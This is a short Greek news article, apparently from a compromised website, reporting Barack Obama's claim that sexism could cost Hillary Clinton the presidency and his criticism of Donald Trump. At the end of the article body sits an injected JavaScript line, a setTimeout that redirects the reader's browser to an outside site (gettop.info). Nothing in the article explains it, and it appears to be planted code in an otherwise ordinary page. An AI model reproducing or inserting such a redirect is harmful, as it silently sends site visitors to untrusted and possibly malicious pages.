Ο «σεξισμός» μπορεί να στερήσει τη νίκη από την Χίλαρι δηλώνει ο Ομπάμα

0
6

 

Στην διαπίστωση ότι αν επικρατήσουν συνθήκες “σεξισμού” στην αμερικανική κοινωνία, τότε η κατάσταση που θα δημιουργηθεί θα είναι “επιβλαβής” για την πορεία της Κλίντον προς τον Λευκό Οίκο, δήλωσε ο Ομπάμα όπως μεταδίδει το CNN.

Υπάρχουν πραγματικοί λόγοι για τους οποίους μέχρι σήμερα δεν είχαμε μία γυναίκα πρόεδρο στις ΗΠΑ. Είμαστε μία κοινωνία που διατηρεί ακόμη επιφυλάξεις όταν δει μία δυναμική γυναίκα.

Αυτό μας προκαλεί προβλήματα αδίκως σε πολλά θέματα”, τόνισε ο Αμερικανός Πρόεδρος.

Ο Ομπάμα αξιοποίησε την ευκαιρία της ομιλίας σε εκδήλωση στην Νέα Υόρκη προκειμένου να εκφράσει την υποστήριξή του στην Κλίντον, ενώ δεν έχασε την ευκαιρία να επιτεθεί στον Ντόναλντ Τραμπ.

Είναι πρωταγωνιστής μιας διαφήμισης ενώ πρόκειται για ριάλιτι σόου. Αυτός ο άνθρωπος δεν διαθέτει τα προσόντα για να γίνει πρόεδρος”, δήλωσε χαρακτηριστικά.

Οι δηλώσεις του Αμερικανού προέδρου έγιναν μία ημέρα μετά την έκκληση που απηύθυνε προς τους αφροαμερικανούς ψηφοφόρους σε εκδήλωση για τους Δημοκρατικούς υποψηφίους του Κογκρέσου, που πραγματοποιήθηκε στην Ουάσινγκτον, παροτρύνοντας τους να εργαστούν προκειμένου να σταματήσουν τον Ντόναλντ Τραμπ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here